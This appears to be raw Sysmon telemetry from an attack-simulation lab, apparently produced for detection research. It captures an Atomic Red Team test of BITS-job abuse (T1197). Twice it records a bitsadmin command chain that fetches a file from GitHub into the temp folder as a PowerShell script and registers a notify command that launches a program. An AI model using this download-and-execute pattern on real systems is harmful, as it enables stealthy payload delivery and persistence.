16:33:12.384{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-52C8-6063-4401-00000000AF01}4372C:\Windows\system32\bitsadmin.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061815Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.384{7F8C56E7-4E3C-6063-1600-00000000AF01}12801520C:\Windows\system32\svchost.exe{7F8C56E7-52C8-6063-4401-00000000AF01}4372C:\Windows\system32\bitsadmin.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061814Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.384{7F8C56E7-4E3C-6063-1600-00000000AF01}12801320C:\Windows\system32\svchost.exe{7F8C56E7-52C8-6063-4401-00000000AF01}4372C:\Windows\system32\bitsadmin.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061813Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.369{7F8C56E7-4F87-6063-CA00-00000000AF01}55846056C:\Windows\system32\conhost.exe{7F8C56E7-52C8-6063-4401-00000000AF01}4372C:\Windows\system32\bitsadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061812Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.369{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061811Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.369{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061810Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.369{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061809Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.369{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061808Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.369{7F8C56E7-4E4F-6063-5500-00000000AF01}38243840C:\Windows\system32\csrss.exe{7F8C56E7-52C8-6063-4401-00000000AF01}4372C:\Windows\system32\bitsadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061807Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.369{7F8C56E7-52C8-6063-4301-00000000AF01}43924396C:\Windows\system32\cmd.exe{7F8C56E7-52C8-6063-4401-00000000AF01}4372C:\Windows\system32\bitsadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8564|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061806Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.376{7F8C56E7-52C8-6063-4401-00000000AF01}4372C:\Windows\System32\bitsadmin.exe7.8.14393.0 (rs1_release.160715-1616)BITS administration utilityMicrosoft® Windows® Operating SystemMicrosoft Corporationbitsadmin.exebitsadmin.exe /create AtomicBITS C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{7F8C56E7-4E65-6063-912A-070000000000}0x72a912HighMD5=F548717B821860C2B2242367732FE105,SHA256=E1057A20945BCE8F00C0BE5E3DB40C4A98AB33F42F4D2DF919AEDB0EF6651D6E,IMPHASH=CE0EB5030AA7D3C8606F11BBCA0BC912{7F8C56E7-52C8-6063-4301-00000000AF01}4392C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /create AtomicBITS & bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %temp%\bitsadmin3_flag.ps1 & bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe "" & bitsadmin.exe /resume AtomicBITS & timeout 5 & bitsadmin.exe /complete AtomicBITS" 10341000x80000000000000001061805Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.369{7F8C56E7-4F87-6063-CA00-00000000AF01}55846056C:\Windows\system32\conhost.exe{7F8C56E7-52C8-6063-4301-00000000AF01}4392C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061804Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.369{7F8C56E7-4F87-6063-C900-00000000AF01}56526096C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{7F8C56E7-52C8-6063-4301-00000000AF01}4392C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c01f5|UNKNOWN(00007FFA71EB3F13) 10341000x80000000000000001061803Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.369{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061802Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.369{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061801Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.369{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061800Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.369{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061799Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.369{7F8C56E7-4E4F-6063-5500-00000000AF01}38244020C:\Windows\system32\csrss.exe{7F8C56E7-52C8-6063-4301-00000000AF01}4392C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061798Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.369{7F8C56E7-4F87-6063-C900-00000000AF01}56526096C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{7F8C56E7-52C8-6063-4301-00000000AF01}4392C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc612994(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc6127fb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc69b92c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc60aa81(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bd0db2d3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc5d0029(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc633a9b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc61593b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc60665b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc642cfe(wow64) 154100x80000000000000001061797Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.370{7F8C56E7-52C8-6063-4301-00000000AF01}4392C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /create AtomicBITS & bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %%temp%%\bitsadmin3_flag.ps1 & bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe "" & bitsadmin.exe /resume AtomicBITS & timeout 5 & bitsadmin.exe /complete AtomicBITS" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{7F8C56E7-4E65-6063-912A-070000000000}0x72a912HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{7F8C56E7-4F87-6063-C900-00000000AF01}5652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000001061796Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.369{7F8C56E7-4F87-6063-C900-00000000AF01}5652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-03-30 16:33:11.072 11241100x80000000000000001061795Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.353{7F8C56E7-4F87-6063-C900-00000000AF01}5652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-03-30 16:33:11.072 23542300x80000000000000001061794Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.322{7F8C56E7-52C7-6063-4201-00000000AF01}4640ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=6A3C46D4C3D7A3266B0D43E483AFE475,SHA256=C5547D4231DA7BFA702937BE580C553583F55D273BFBEADA5EE021376C4A3E7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061793Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.119{7F8C56E7-4E3C-6063-1600-00000000AF01}1280NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\ADMINI~1\AppData\Local\Temp\BITD0EA.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061792Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.072{7F8C56E7-4E3C-6063-1600-00000000AF01}1280NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\ADMINI~1\AppData\Local\Temp\BITD0EA.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061791Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.056{7F8C56E7-4E3C-6063-1600-00000000AF01}12801804C:\Windows\system32\svchost.exe{7F8C56E7-52C7-6063-4201-00000000AF01}4640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\qmgr.dll+2f267|c:\windows\system32\qmgr.dll+2db8f|c:\windows\system32\qmgr.dll+1f9de|c:\windows\system32\qmgr.dll+1fd4c|c:\windows\system32\qmgr.dll+1fb85|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 23542300x8000000000000000246547Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:12.132{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64F212B85A9EC10E19F1E22142C11D8E,SHA256=0EC48FAFE4C64396EDB3A812E84AB3479095D98F3D4E4507B8709164788DA943,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061871Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.835{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54860-false10.0.1.12-8000- 354300x80000000000000001061870Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.074{7F8C56E7-4E3C-6063-1600-00000000AF01}1280C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54859-false185.199.109.133cdn-185-199-109-133.github.com443https 23542300x80000000000000001061869Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:13.291{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0A32F13AA5DBF95BA28463A3ED6A1522,SHA256=6B35F314296787A5618401FA064E405CFB7C57A52B11E418B72340F6853BCF56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246548Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:13.132{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD44AA518DCB72DF7D6019109100A6CD,SHA256=062565721947BE7B4653B254D2A68770E06AAD3F90C492CA4CAE72761E582ECF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061874Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:14.760{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 